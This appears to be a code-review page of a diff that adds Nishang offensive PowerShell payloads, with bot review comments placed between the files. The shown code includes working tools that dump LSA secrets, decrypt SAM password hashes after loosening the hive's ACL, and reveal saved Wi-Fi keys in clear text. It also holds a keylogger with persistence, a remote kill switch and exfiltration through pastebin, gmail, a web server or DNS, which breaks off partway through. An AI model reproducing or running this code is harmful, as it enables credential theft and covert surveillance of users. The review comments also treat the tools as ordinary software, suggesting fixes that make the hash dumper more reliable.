public LSA_UNICODE_STRING ObjectName;
public uint Attributes;
public IntPtr SecurityDescriptor;
public IntPtr SecurityQualityOfService;
}
public enum LSA_AccessPolicy : long
{
POLICY_VIEW_LOCAL_INFORMATION = 0x00000001L,
POLICY_VIEW_AUDIT_INFORMATION = 0x00000002L,
POLICY_GET_PRIVATE_INFORMATION = 0x00000004L,
POLICY_TRUST_ADMIN = 0x00000008L,
POLICY_CREATE_ACCOUNT = 0x00000010L,
POLICY_CREATE_SECRET = 0x00000020L,
POLICY_CREATE_PRIVILEGE = 0x00000040L,
POLICY_SET_DEFAULT_QUOTA_LIMITS = 0x00000080L,
POLICY_SET_AUDIT_REQUIREMENTS = 0x00000100L,
POLICY_AUDIT_LOG_ADMIN = 0x00000200L,
POLICY_SERVER_ADMIN = 0x00000400L,
POLICY_LOOKUP_NAMES = 0x00000800L,
POLICY_NOTIFICATION = 0x00001000L
}
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
public static extern uint LsaRetrievePrivateData(
IntPtr PolicyHandle,
ref LSA_UNICODE_STRING KeyName,
out IntPtr PrivateData
);
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
public static extern uint LsaStorePrivateData(
IntPtr policyHandle,
ref LSA_UNICODE_STRING KeyName,
ref LSA_UNICODE_STRING PrivateData
);
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
public static extern uint LsaOpenPolicy(
ref LSA_UNICODE_STRING SystemName,
ref LSA_OBJECT_ATTRIBUTES ObjectAttributes,
uint DesiredAccess,
out IntPtr PolicyHandle
);
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
public static extern uint LsaNtStatusToWinError(
uint status
);
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
public static extern uint LsaClose(
IntPtr policyHandle
);
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
public static extern uint LsaFreeMemory(
IntPtr buffer
);
"@
Add-Type -MemberDefinition $signature -Name LSAUtil -Namespace LSAUtil
}
Process{
foreach($key in $RegistryKey) {
$regPath = "HKLM:\\SECURITY\Policy\Secrets\" + $key
$tempRegPath = "HKLM:\\SECURITY\Policy\Secrets\MySecret"
$myKey = "MySecret"
if(Test-Path $regPath) {
Try {
Get-ChildItem $regPath -ErrorAction Stop | Out-Null
}
Catch {
Write-Error -Message "Access to registry Denied, run as NT AUTHORITY\SYSTEM" -Category PermissionDenied
Break
}
if(Test-Path $regPath) {
# Copy Key
"CurrVal","OldVal","OupdTime","CupdTime","SecDesc" | ForEach-Object {
$copyFrom = "HKLM:\SECURITY\Policy\Secrets\" + $key + "\" + $_
$copyTo = "HKLM:\SECURITY\Policy\Secrets\MySecret\" + $_
if( -not(Test-Path $copyTo) ) {
mkdir $copyTo | Out-Null
}
$item = Get-ItemProperty $copyFrom
Set-ItemProperty -Path $copyTo -Name '(default)' -Value $item.'(default)'
}
}
$Script:pastevalue
# Attributes
$objectAttributes = New-Object LSAUtil.LSAUtil+LSA_OBJECT_ATTRIBUTES
$objectAttributes.Length = 0
$objectAttributes.RootDirectory = [IntPtr]::Zero
$objectAttributes.Attributes = 0
$objectAttributes.SecurityDescriptor = [IntPtr]::Zero
$objectAttributes.SecurityQualityOfService = [IntPtr]::Zero
# localSystem
$localsystem = New-Object LSAUtil.LSAUtil+LSA_UNICODE_STRING
$localsystem.Buffer = [IntPtr]::Zero
$localsystem.Length = 0
$localsystem.MaximumLength = 0
# Secret Name
$secretName = New-Object LSAUtil.LSAUtil+LSA_UNICODE_STRING
$secretName.Buffer = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($myKey)
$secretName.Length = [Uint16]($myKey.Length * [System.Text.UnicodeEncoding]::CharSize)
$secretName.MaximumLength = [Uint16](($myKey.Length + 1) * [System.Text.UnicodeEncoding]::CharSize)
# Get LSA PolicyHandle
$lsaPolicyHandle = [IntPtr]::Zero
[LSAUtil.LSAUtil+LSA_AccessPolicy]$access = [LSAUtil.LSAUtil+LSA_AccessPolicy]::POLICY_GET_PRIVATE_INFORMATION
$lsaOpenPolicyHandle = [LSAUtil.LSAUtil]::LSAOpenPolicy([ref]$localSystem, [ref]$objectAttributes, $access, [ref]$lsaPolicyHandle)
if($lsaOpenPolicyHandle -ne 0) {
Write-Warning "lsaOpenPolicyHandle Windows Error Code: $lsaOpenPolicyHandle"
Continue
}
# Retrieve Private Data
$privateData = [IntPtr]::Zero
$ntsResult = [LSAUtil.LSAUtil]::LsaRetrievePrivateData($lsaPolicyHandle, [ref]$secretName, [ref]$privateData)
$lsaClose = [LSAUtil.LSAUtil]::LsaClose($lsaPolicyHandle)
$lsaNtStatusToWinError = [LSAUtil.LSAUtil]::LsaNtStatusToWinError($ntsResult)
if($lsaNtStatusToWinError -ne 0) {
Write-Warning "lsaNtsStatusToWinError: $lsaNtStatusToWinError"
}
[LSAUtil.LSAUtil+LSA_UNICODE_STRING]$lusSecretData =
[LSAUtil.LSAUtil+LSA_UNICODE_STRING][System.Runtime.InteropServices.marshal]::PtrToStructure($privateData, [LSAUtil.LSAUtil+LSA_UNICODE_STRING])
Try {
[string]$value = [System.Runtime.InteropServices.marshal]::PtrToStringAuto($lusSecretData.Buffer)
$value = $value.SubString(0, ($lusSecretData.Length / 2))
}
Catch {
$value = ""
}
if($key -match "^_SC_") {
# Get Service Account
$serviceName = $key -Replace "^_SC_"
Try {
# Get Service Account
$service = Get-WmiObject -Query "SELECT StartName FROM Win32_Service WHERE Name = '$serviceName'" -ErrorAction Stop
$account = $service.StartName
}
Catch {
$account = ""
}
} else {
$account = ""
}
# Return Object
$obj = New-Object PSObject -Property @{
Name = $key;
Secret = $value;
Account = $Account
}
$obj | Select-Object Name, Account, Secret, @{Name="ComputerName";Expression={$env:COMPUTERNAME}}
}
else {
Write-Error -Message "Path not found: $regPath" -Category ObjectNotFound
}
}
}
end {
if(Test-Path $tempRegPath) {
Remove-Item -Path "HKLM:\\SECURITY\Policy\Secrets\MySecret" -Recurse -Force
}
}
}
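Review bot: the two `Break` statements in `Begin` (after `Write-Warning "Run the Command as an Administrator"` and `Write-Warning "Run PowerShell in 32-bit mode"`) are outside any loop; in PowerShell a `Break` with no enclosing loop propagates to the caller and ends its enclosing loop or script rather than returning from the function. Use `return` or `throw`. The temporary key `HKLM:\\SECURITY\Policy\Secrets\MySecret` is created in `Begin` and removed only in `end`, so any terminating error in between leaves it in place; wrap the work in `try/finally`. The help is out of sync with the parameter: `.EXAMPLE PS > Get-LsaSecret -Key KeyName` fails because the only parameter is `-RegistryKey`. Also, `$Script:pastevalue` in `Process` is a stray expression that outputs nothing, and `$tempRegPath` used in `end` is assigned only inside the `foreach`, so `Test-Path $tempRegPath` throws when no key was processed.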

View file

@ -0,0 +1,400 @@
<#
.SYNOPSIS
Nishang payload which dumps password hashes.
.DESCRIPTION
The payload dumps password hashes using the modified powerdump script from MSF. Administrator privileges are required for this script
(but not SYSTEM privs as for the original powerdump)
.EXAMPLE
PS > Get-PassHashes
.LINK
http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html?showComment=1386725874167#c8513980725823764060
https://github.com/samratashok/nishang
#>
function Get-PassHashes {
[CmdletBinding()]
Param ()
#######################################powerdump written by David Kennedy#########################################
function LoadApi
{
$oldErrorAction = $global:ErrorActionPreference;
$global:ErrorActionPreference = "SilentlyContinue";
$test = [PowerDump.Native];
$global:ErrorActionPreference = $oldErrorAction;
if ($test)
{
# already loaded
return;
}
$code = @'
using System;
using System.Security.Cryptography;
using System.Runtime.InteropServices;
using System.Text;
namespace PowerDump
{
public class Native
{
[DllImport("advapi32.dll", CharSet = CharSet.Auto)]
public static extern int RegOpenKeyEx(
int hKey,
string subKey,
int ulOptions,
int samDesired,
out int hkResult);
[DllImport("advapi32.dll", EntryPoint = "RegEnumKeyEx")]
extern public static int RegEnumKeyEx(
int hkey,
int index,
StringBuilder lpName,
ref int lpcbName,
int reserved,
StringBuilder lpClass,
ref int lpcbClass,
out long lpftLastWriteTime);
[DllImport("advapi32.dll", EntryPoint="RegQueryInfoKey", CallingConvention=CallingConvention.Winapi, SetLastError=true)]
extern public static int RegQueryInfoKey(
int hkey,
StringBuilder lpClass,
ref int lpcbClass,
int lpReserved,
out int lpcSubKeys,
out int lpcbMaxSubKeyLen,
out int lpcbMaxClassLen,
out int lpcValues,
out int lpcbMaxValueNameLen,
out int lpcbMaxValueLen,
out int lpcbSecurityDescriptor,
IntPtr lpftLastWriteTime);
[DllImport("advapi32.dll", SetLastError=true)]
public static extern int RegCloseKey(
int hKey);
}
} // end namespace PowerDump
public class Shift {
public static int Right(int x, int count) { return x >> count; }
public static uint Right(uint x, int count) { return x >> count; }
public static long Right(long x, int count) { return x >> count; }
public static ulong Right(ulong x, int count) { return x >> count; }
public static int Left(int x, int count) { return x << count; }
public static uint Left(uint x, int count) { return x << count; }
public static long Left(long x, int count) { return x << count; }
public static ulong Left(ulong x, int count) { return x << count; }
}
'@
$provider = New-Object Microsoft.CSharp.CSharpCodeProvider
$dllName = [PsObject].Assembly.Location
$compilerParameters = New-Object System.CodeDom.Compiler.CompilerParameters
$assemblies = @("System.dll", $dllName)
$compilerParameters.ReferencedAssemblies.AddRange($assemblies)
$compilerParameters.GenerateInMemory = $true
$compilerResults = $provider.CompileAssemblyFromSource($compilerParameters, $code)
if($compilerResults.Errors.Count -gt 0) {
$compilerResults.Errors | % { Write-Error ("{0}:`t{1}" -f $_.Line,$_.ErrorText) }
}
}
$antpassword = [Text.Encoding]::ASCII.GetBytes("NTPASSWORD`0");
$almpassword = [Text.Encoding]::ASCII.GetBytes("LMPASSWORD`0");
$empty_lm = [byte[]]@(0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee,0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee);
$empty_nt = [byte[]]@(0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89,0xc0);
$odd_parity = @(
1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
);
function sid_to_key($sid)
{
$s1 = @();
$s1 += [char]($sid -band 0xFF);
$s1 += [char]([Shift]::Right($sid,8) -band 0xFF);
$s1 += [char]([Shift]::Right($sid,16) -band 0xFF);
$s1 += [char]([Shift]::Right($sid,24) -band 0xFF);
$s1 += $s1[0];
$s1 += $s1[1];
$s1 += $s1[2];
$s2 = @();
$s2 += $s1[3]; $s2 += $s1[0]; $s2 += $s1[1]; $s2 += $s1[2];
$s2 += $s2[0]; $s2 += $s2[1]; $s2 += $s2[2];
return ,((str_to_key $s1),(str_to_key $s2));
}
function str_to_key($s)
{
$key = @();
$key += [Shift]::Right([int]($s[0]), 1 );
$key += [Shift]::Left( $([int]($s[0]) -band 0x01), 6) -bor [Shift]::Right([int]($s[1]),2);
$key += [Shift]::Left( $([int]($s[1]) -band 0x03), 5) -bor [Shift]::Right([int]($s[2]),3);
$key += [Shift]::Left( $([int]($s[2]) -band 0x07), 4) -bor [Shift]::Right([int]($s[3]),4);
$key += [Shift]::Left( $([int]($s[3]) -band 0x0F), 3) -bor [Shift]::Right([int]($s[4]),5);
$key += [Shift]::Left( $([int]($s[4]) -band 0x1F), 2) -bor [Shift]::Right([int]($s[5]),6);
$key += [Shift]::Left( $([int]($s[5]) -band 0x3F), 1) -bor [Shift]::Right([int]($s[6]),7);
$key += $([int]($s[6]) -band 0x7F);
0..7 | %{
$key[$_] = [Shift]::Left($key[$_], 1);
$key[$_] = $odd_parity[$key[$_]];
}
return ,$key;
}
function NewRC4([byte[]]$key)
{
return new-object Object |
Add-Member NoteProperty key $key -PassThru |
Add-Member NoteProperty S $null -PassThru |
Add-Member ScriptMethod init {
if (-not $this.S)
{
[byte[]]$this.S = 0..255;
0..255 | % -begin{[long]$j=0;}{
$j = ($j + $this.key[$($_ % $this.key.Length)] + $this.S[$_]) % $this.S.Length;
$temp = $this.S[$_]; $this.S[$_] = $this.S[$j]; $this.S[$j] = $temp;
}
}
} -PassThru |
Add-Member ScriptMethod "encrypt" {
$data = $args[0];
$this.init();
$outbuf = new-object byte[] $($data.Length);
$S2 = $this.S[0..$this.S.Length];
0..$($data.Length-1) | % -begin{$i=0;$j=0;} {
$i = ($i+1) % $S2.Length;
$j = ($j + $S2[$i]) % $S2.Length;
$temp = $S2[$i];$S2[$i] = $S2[$j];$S2[$j] = $temp;
$a = $data[$_];
$b = $S2[ $($S2[$i]+$S2[$j]) % $S2.Length ];
$outbuf[$_] = ($a -bxor $b);
}
return ,$outbuf;
} -PassThru
}
function des_encrypt([byte[]]$data, [byte[]]$key)
{
return ,(des_transform $data $key $true)
}
function des_decrypt([byte[]]$data, [byte[]]$key)
{
return ,(des_transform $data $key $false)
}
function des_transform([byte[]]$data, [byte[]]$key, $doEncrypt)
{
$des = new-object Security.Cryptography.DESCryptoServiceProvider;
$des.Mode = [Security.Cryptography.CipherMode]::ECB;
$des.Padding = [Security.Cryptography.PaddingMode]::None;
$des.Key = $key;
$des.IV = $key;
$transform = $null;
if ($doEncrypt) {$transform = $des.CreateEncryptor();}
else{$transform = $des.CreateDecryptor();}
$result = $transform.TransformFinalBlock($data, 0, $data.Length);
return ,$result;
}
function Get-RegKeyClass([string]$key, [string]$subkey)
{
switch ($Key) {
"HKCR" { $nKey = 0x80000000} #HK Classes Root
"HKCU" { $nKey = 0x80000001} #HK Current User
"HKLM" { $nKey = 0x80000002} #HK Local Machine
"HKU" { $nKey = 0x80000003} #HK Users
"HKCC" { $nKey = 0x80000005} #HK Current Config
default {
throw "Invalid Key. Use one of the following options HKCR, HKCU, HKLM, HKU, HKCC"
}
}
$KEYQUERYVALUE = 0x1;
$KEYREAD = 0x19;
$KEYALLACCESS = 0x3F;
$result = "";
[int]$hkey=0
if (-not [PowerDump.Native]::RegOpenKeyEx($nkey,$subkey,0,$KEYREAD,[ref]$hkey))
{
$classVal = New-Object Text.Stringbuilder 1024
[int]$len = 1024
if (-not [PowerDump.Native]::RegQueryInfoKey($hkey,$classVal,[ref]$len,0,[ref]$null,[ref]$null,
[ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,0))
{
$result = $classVal.ToString()
}
else
{
Write-Error "RegQueryInfoKey failed";
}
[PowerDump.Native]::RegCloseKey($hkey) | Out-Null
}
else
{
Write-Error "Cannot open key";
}
return $result;
}
function Get-BootKey
{
$s = [string]::Join("",$("JD","Skew1","GBG","Data" | %{Get-RegKeyClass "HKLM" "SYSTEM\CurrentControlSet\Control\Lsa\$_"}));
$b = new-object byte[] $($s.Length/2);
0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)}
$b2 = new-object byte[] 16;
0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 | % -begin{$i=0;}{$b2[$i]=$b[$_];$i++}
return ,$b2;
}
function Get-HBootKey
{
param([byte[]]$bootkey);
$aqwerty = [Text.Encoding]::ASCII.GetBytes("!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%`0");
$anum = [Text.Encoding]::ASCII.GetBytes("0123456789012345678901234567890123456789`0");
$k = Get-Item HKLM:\SAM\SAM\Domains\Account;
if (-not $k) {return $null}
[byte[]]$F = $k.GetValue("F");
if (-not $F) {return $null}
$rc4key = [Security.Cryptography.MD5]::Create().ComputeHash($F[0x70..0x7F] + $aqwerty + $bootkey + $anum);
$rc4 = NewRC4 $rc4key;
return ,($rc4.encrypt($F[0x80..0x9F]));
}
function Get-UserName([byte[]]$V)
{
if (-not $V) {return $null};
$offset = [BitConverter]::ToInt32($V[0x0c..0x0f],0) + 0xCC;
$len = [BitConverter]::ToInt32($V[0x10..0x13],0);
return [Text.Encoding]::Unicode.GetString($V, $offset, $len);
}
function Get-UserHashes($u, [byte[]]$hbootkey)
{
[byte[]]$enc_lm_hash = $null; [byte[]]$enc_nt_hash = $null;
if ($u.HashOffset + 0x28 -lt $u.V.Length)
{
$lm_hash_offset = $u.HashOffset + 4;
$nt_hash_offset = $u.HashOffset + 8 + 0x10;
$enc_lm_hash = $u.V[$($lm_hash_offset)..$($lm_hash_offset+0x0f)];
$enc_nt_hash = $u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
}
elseif ($u.HashOffset + 0x14 -lt $u.V.Length)
{
$nt_hash_offset = $u.HashOffset + 8;
$enc_nt_hash = [byte[]]$u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
}
return ,(DecryptHashes $u.Rid $enc_lm_hash $enc_nt_hash $hbootkey);
}
function DecryptHashes($rid, [byte[]]$enc_lm_hash, [byte[]]$enc_nt_hash, [byte[]]$hbootkey)
{
[byte[]]$lmhash = $empty_lm; [byte[]]$nthash=$empty_nt;
# LM Hash
if ($enc_lm_hash)
{
$lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;
}
# NT Hash
if ($enc_nt_hash)
{
$nthash = DecryptSingleHash $rid $hbootkey $enc_nt_hash $antpassword;
}
return ,($lmhash,$nthash)
}
function DecryptSingleHash($rid,[byte[]]$hbootkey,[byte[]]$enc_hash,[byte[]]$lmntstr)
{
$deskeys = sid_to_key $rid;
$md5 = [Security.Cryptography.MD5]::Create();
$rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);
$rc4 = NewRC4 $rc4_key;
$obfkey = $rc4.encrypt($enc_hash);
$hash = (des_decrypt $obfkey[0..7] $deskeys[0]) +
(des_decrypt $obfkey[8..$($obfkey.Length - 1)] $deskeys[1]);
return ,$hash;
}
function Get-UserKeys
{
ls HKLM:\SAM\SAM\Domains\Account\Users |
where {$_.PSChildName -match "^[0-9A-Fa-f]{8}$"} |
Add-Member AliasProperty KeyName PSChildName -PassThru |
Add-Member ScriptProperty Rid {[Convert]::ToInt32($this.PSChildName, 16)} -PassThru |
Add-Member ScriptProperty V {[byte[]]($this.GetValue("V"))} -PassThru |
Add-Member ScriptProperty UserName {Get-UserName($this.GetValue("V"))} -PassThru |
Add-Member ScriptProperty HashOffset {[BitConverter]::ToUInt32($this.GetValue("V")[0x9c..0x9f],0) + 0xCC} -PassThru
}
function DumpHashes
{
LoadApi
$bootkey = Get-BootKey;
$hbootKey = Get-HBootKey $bootkey;
Get-UserKeys | %{
$hashes = Get-UserHashes $_ $hBootKey;
"{0}:{1}:{2}:{3}:::" -f ($_.UserName,$_.Rid,
[BitConverter]::ToString($hashes[0]).Replace("-","").ToLower(),
[BitConverter]::ToString($hashes[1]).Replace("-","").ToLower());
}
}
#http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html?showComment=1386725874167#c8513980725823764060
if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
{
Write-Warning "Script requires elevated or administrative privileges."
Return
}
else
{
#Set permissions for the current user.
$rule = New-Object System.Security.AccessControl.RegistryAccessRule (
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name,
"FullControl",
[System.Security.AccessControl.InheritanceFlags]"ObjectInherit,ContainerInherit",
[System.Security.AccessControl.PropagationFlags]"None",
[System.Security.AccessControl.AccessControlType]"Allow")
$key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
"SAM\SAM\Domains",
[Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree,
[System.Security.AccessControl.RegistryRights]::ChangePermissions)
$acl = $key.GetAccessControl()
$acl.SetAccessRule($rule)
$key.SetAccessControl($acl)
DumpHashes
#Remove the permissions added above.
$user = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
$acl.Access | where {$_.IdentityReference.Value -eq $user} | %{$acl.RemoveAccessRule($_)} | Out-Null
Set-Acl HKLM:\SAM\SAM\Domains $acl
}
}
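Review bot: the FullControl rule granted to the current user on `HKLM\SAM\SAM\Domains` is only removed if `DumpHashes` returns normally; there is no try/finally, so any exception inside it (a failed `RegOpenKeyEx`, a malformed `V` value) leaves the extra ACE on the SAM hive. Move the `$acl.Access | where ... RemoveAccessRule` and `Set-Acl` lines into a `finally` block, and remove only `$rule` rather than every ACE whose `IdentityReference` equals the current user, since pre-existing rules for that account would be dropped too. The grant is applied with `$key.SetAccessControl($acl)` but the revert goes through `Set-Acl HKLM:\SAM\SAM\Domains $acl`; use one mechanism for both. `Get-RegKeyClass` returns `""` on failure, so `Get-BootKey` would silently build a key from a short `$b` (out-of-range indexes read as `$null`) instead of stopping; check `$s.Length -eq 32` before the `0x8, 0x5, 0x4 ...` permutation. From the monitoring side, a DACL change on the SAM hive followed by a non-LSASS process enumerating `HKLM:\SAM\SAM\Domains\Account\Users` is exactly what registry object-access auditing records, and the docstring should say the script produces those events.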

@ -0,0 +1,28 @@
<#
.SYNOPSIS
Nishang Payload which dumps keys for WLAN profiles.
.DESCRIPTION
This payload dumps keys in clear text for saved WLAN profiles.
The payload must be run from as administrator to get the keys.
.EXAMPLE
PS > Get-WLAN-Keys
.LINK
http://poshcode.org/1700
https://github.com/samratashok/nishang
#>
function Get-Wlan-Keys
{
[CmdletBinding()]
Param ()
$wlans = netsh wlan show profiles | Select-String -Pattern "All User Profile" | Foreach-Object {$_.ToString()}
$exportdata = $wlans | Foreach-Object {$_.Replace(" All User Profile : ",$null)}
$exportdata | ForEach-Object {netsh wlan show profiles name="$_" key=clear}
}
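Review bot: the profile list is recovered by matching the literal English strings `"All User Profile"` and `" All User Profile : "`, so on a non-English Windows build, or one where `netsh` pads the output differently, `$wlans` is empty and the function returns nothing without any error; either split on the colon and trim, or state the English-locale assumption in `.DESCRIPTION`. Two help-text nits: `must be run from as administrator` has a stray word, and `.EXAMPLE` spells the command `Get-WLAN-Keys` while the definition is `Get-Wlan-Keys` (harmless in PowerShell, but the README and help should agree).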

@ -0,0 +1,388 @@
<#
.SYNOPSIS
Nishang Payload which logs keys.
.DESCRIPTION
This payload logs a user's keys and writes them to file key.log (I know its bad :|) in user's temp directory.
The keys are than pasted to pastebin|tinypaste|gmail|all as per selection. Saved keys could then be decoded
using the Parse_Key script in nishang.
.PARAMETER persist
Use this parameter to achieve reboot persistence. Different methods of persistence with Admin access and normal user access.
.PARAMETER ExfilOption
The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
.PARAMETER dev_key
The Unique API key provided by pastebin when you register a free account.
Unused for other options
.PARAMETER username
Username for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER password
Password for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER URL
The URL of the webserver where POST requests would be sent.
.PARAMETER DomainName
The DomainName, whose subdomains would be used for sending TXT queries to.
.PARAMETER AuthNS
Authoritative Name Server for the domain specified in DomainName
.PARAMETER MagicString
The string which when found at CheckURL will stop the keylogger.
.PARAMETER CheckURL
The URL which would contain the MagicString used to stop keylogging.
.EXAMPLE
PS > .\Keylogger.ps1
The payload will ask for all required options.
.EXAMPLE
PS > .\Keylogger.ps1 http://example.com stopthis
Use above when using the payload from non-interactive shells and no exfiltration is required.
.EXAMPLE
PS > .\Keylogger.ps1 http://example.com stopthis -exfil <dev_key> <username> <pass> 3
Use above when using the payload from non-interactive shells or you don't want the payload to ask for any options.
.EXAMPLE
PS > .\Keylogger.ps1 -persist
Use above for reboot persistence.
.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>
[CmdletBinding(DefaultParameterSetName="noexfil")] Param(
[Parameter(Parametersetname="exfil")]
[Switch]
$persist,
[Parameter(Parametersetname="exfil")]
[Switch]
$exfil,
[Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")]
[String]
$CheckURL,
[Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")]
[String]
$MagicString,
[Parameter(Position = 2, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
[String]
$ExfilOption,
[Parameter(Position = 3, Mandatory = $False, Parametersetname="exfil")]
[String]
$dev_key = "null",
[Parameter(Position = 4, Mandatory = $False, Parametersetname="exfil")]
[String]
$username = "null",
[Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")]
[String]
$password = "null",
[Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")]
[String]
$URL = "null",
[Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")]
[String]
$DomainName = "null",
[Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
[String]
$AuthNS = "null"
)
$functions = {
function Keylogger
{
Param (
[Parameter(Position = 0, Mandatory = $True)]
[String]
$MagicString,
[Parameter(Position = 1, Mandatory = $True)]
[String]
$CheckURL
)
$signature = @"
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
"@
$getKeyState = Add-Type -memberDefinition $signature -name "Newtype" -namespace newnamespace -passThru
$check = 0
while ($true)
{
Start-Sleep -Milliseconds 40
$logged = ""
$result=""
$shift_state=""
$caps_state=""
for ($char=1;$char -le 254;$char++)
{
$vkey = $char
$logged = $getKeyState::GetAsyncKeyState($vkey)
if ($logged -eq -32767)
{
if(($vkey -ge 48) -and ($vkey -le 57))
{
$left_shift_state = $getKeyState::GetAsyncKeyState(160)
$right_shift_state = $getKeyState::GetAsyncKeyState(161)
if(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768))
{
$result = "S-" + $vkey
}
else
{
$result = $vkey
}
}
elseif(($vkey -ge 64) -and ($vkey -le 90))
{
$left_shift_state = $getKeyState::GetAsyncKeyState(160)
$right_shift_state = $getKeyState::GetAsyncKeyState(161)
$caps_state = [console]::CapsLock
if(!(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768)) -xor $caps_state)
{
$result = "S-" + $vkey
}
else
{
$result = $vkey
}
}
elseif((($vkey -ge 186) -and ($vkey -le 192)) -or (($vkey -ge 219) -and ($vkey -le 222)))
{
$left_shift_state = $getKeyState::GetAsyncKeyState(160)
$right_shift_state = $getKeyState::GetAsyncKeyState(161)
if(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768))
{
$result = "S-" + $vkey
}
else
{
$result = $vkey
}
}
else
{
$result = $vkey
}
$now = Get-Date;
$logLine = "$result "
$filename = "$env:temp\key.log"
Out-File -FilePath $fileName -Append -InputObject "$logLine"
}
}
$check++
if ($check -eq 6000)
{
$webclient = New-Object System.Net.WebClient
$filecontent = $webclient.DownloadString("$CheckURL")
if ($filecontent -eq $MagicString)
{
break
}
$check = 0
}
}
}
function Keypaste
{
Param (
[Parameter(Position = 0, Mandatory = $True)]
[String]
$ExfilOption,
[Parameter(Position = 1, Mandatory = $True)]
[String]
$dev_key,
[Parameter(Position = 2, Mandatory = $True)]
[String]
$username,
[Parameter(Position = 3, Mandatory = $True)]
[String]
$password,
[Parameter(Position = 4, Mandatory = $True)]
[String]
$URL,
[Parameter(Position = 5, Mandatory = $True)]
[String]
$AuthNS,
[Parameter(Position = 6, Mandatory = $True)]
[String]
$MagicString,
[Parameter(Position = 7, Mandatory = $True)]
[String]
$CheckURL
)
$check = 0
while($true)
{
$read = 0
Start-Sleep -Seconds 5
$pastevalue=Get-Content $env:temp\key.log
$read++
if ($read -eq 30)
{
Out-File -FilePath $env:temp\key.log -Force -InputObject " "
$read = 0
}
$now = Get-Date;
$name = $env:COMPUTERNAME
$paste_name = $name + " : " + $now.ToUniversalTime().ToString("dd/MM/yyyy HH:mm:ss:fff")
function post_http($url,$parameters)
{
$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open("POST", $url, $false)
$http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
$http_request.setRequestHeader("Content-length", $parameters.length);
$http_request.setRequestHeader("Connection", "close")
$http_request.send($parameters)
$script:session_key=$http_request.responseText
}
function Compress-Encode
{
#Compression logic from http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
$encdata = [string]::Join("`n", $pastevalue)
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
$sw = New-Object System.IO.StreamWriter($cs)
$sw.Write($encdata)
$sw.Close();
$Compressed = [Convert]::ToBase64String($ms.ToArray())
$Compressed
}
if ($exfiloption -eq "pastebin")
{
